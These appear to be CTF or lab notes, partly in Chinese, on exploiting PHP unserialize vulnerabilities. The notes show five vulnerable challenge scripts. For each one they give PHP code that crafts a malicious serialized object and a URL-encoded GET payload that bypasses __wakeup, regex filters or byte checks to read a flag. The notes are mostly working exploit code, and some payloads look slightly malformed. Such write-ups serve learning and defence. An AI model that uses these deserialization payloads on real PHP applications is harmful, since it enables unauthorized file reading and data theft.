unserialize serialize

example 1

<?php
class SoFun{
protected $file='index.php';
function __destruct(){
if(!empty($this->file)) {
if(strchr($this-> file,"\\")===false && strchr($this->file, '/')===false)
show_source(dirname (__FILE__).'/'.$this ->file);
else
die('Wrong filename.');
}
}
function __wakeup(){
$this->file='index.php';
}
}
if (!isset($_GET['tryhackme'])){
show_source(__FILE__);
}
else{
$a=$_GET['tryhackme'];
unserialize($a);
}
?>

write new php to encode

<?php
class SoFun{
protected $file='flag.php';
}
$a = new SoFun();
echo urlencode(serialize($a));
?>

GET /un1.php?tryhackme=O%3A5%3A%22SoFun%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A8%3A%22flag.php%22%3B%7D can see the flag 改变 O:5:“SoFun”:1:{s:7:“*file”;s:8:“flag.php”;} to O:5:“SoFun”:2:{s:7:“*file”;s:8:“flag.php”;} 可以防止__wakeup()方法执行 GET /un1.php?tryhackme=O%3A5%3A%22SoFun%22%3A%3A%7Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A8%3A%22flag.php%22%3B%7D

example 2

<?php
include "flag.php";
class funny{
function __wakeup(){
global $flag;
echo $flag;
}
}
if (isset($_GET['tryhackme'])){
$a = $_GET['tryhackme'];
if(preg_match('/[oc]:\d+:/i', $a)){
die("NONONO!");
} else {
unserialize($a);
}
} else {
show_source(__FILE__);
}

<?php
class funny{
}
$a = new funny();
echo serialize($a);
?>

O:5:“funny”:0:{} to O:+5:“funny”:0:{} and URL encode GET /un2.php?tryhackme=O%3A%2B5%3A%22funny%22%3A0%3A%7B%7D

example 3

<!-un3.php-->
<?php
include "flag.php";
class funny{
private $password;
public $verify;
function __wakeup(){
global $nobodyknow;
global $flag;
$this->password = $nobodyknow;
if ($this->password === $this->verify){
echo $flag;
} else {
echo "Hacking??!";
}
}
}
if (isset($_GET['tryhackme'])){
$a = $_GET['tryhackme'];
unserialize($a);
} else {
show_source(__FILE__);
}
?>

构造: $o->verify = &$o->password; //构造时需要将password的属性改为public

class funny{
private $password;
public $verify;
function __construct(){
$this->verify = &$this->password;
}
}
$a = new funny();
echo serialize($a);
echo urlencode(serialize($a));

GET /un3.php?tryhackme=O%3A5%3A%22funny%22%3A2%3A%7Bs%3A15%3A%22%00funny%00password%22%3BN%3Bs%3A6%3A%22verify%22%3BR%3A2%3B%7D

example 4

<?php
include "flag.php";
class funny{
private $a;
function __construct() {
$this->a = "givemeflag";
}
function __destruct() {
global $flag;
if ($this->a === "givemeflag") {
echo $flag;
}
}
}
if (isset($_GET['tryhackme']) && is_string($_GET['tryhackme'])){
$a = $_GET['tryhackme'];
for($i=0;$i<strlen($a);$i++){
if (ord($a[$i]) < 32 || ord($a[$i]) > 126) {
die("hacker!");
}
}
unserialize($a);
} else {
show_source(__FILE__);
}

class funny{
private $a;
function __construct() {
$this->a = "givemeflag";
}
}
$a = new funny();
echo serialize($a);
echo urlencode(serialize($a));

O:5:“funny”:1:{s:8:“funnya”;s:10:“givemeflag”;} to O:5:“funny”:1:{S:8:“\00funny\00a”;s:10:“givemeflag”;} and urlencode GET /un5.php?tryhackme=O%3A5%3A%22funny%22%3A1%3A%7BS%3A8%3A%22%5C00funny%5C00a%22%3Bs%3A10%3A%22givemeflag%22%3B%7D

example 5

<!-un6.php-->
<?php
include "flag.php";
ini_set('display_errors',true);
error_reporting(E_ALL | E_STRICT);
class funny{
public function pyflag(){
global $flag;
echo $flag;
}
}
if (isset($_GET['tryhackme']) && is_string($_GET['tryhackme'])){
$a = unserialize($_GET['tryhackme']);
var_dump($a);
$a();
} else {
show_source(__FILE__);
}
?>

class funny{}
$a = array(new funny(),"pyflag");
echo serialize($a);
echo urlencode(serialize($a));

GET /un6.php?tryhackme=a%3A2%3A%7Bi%3A0%3BO%3A5%3A%22funny%22%3A0%3A%7B%7Di%3A1%3Bs%3A6%3A%22pyflag%22%3B%7D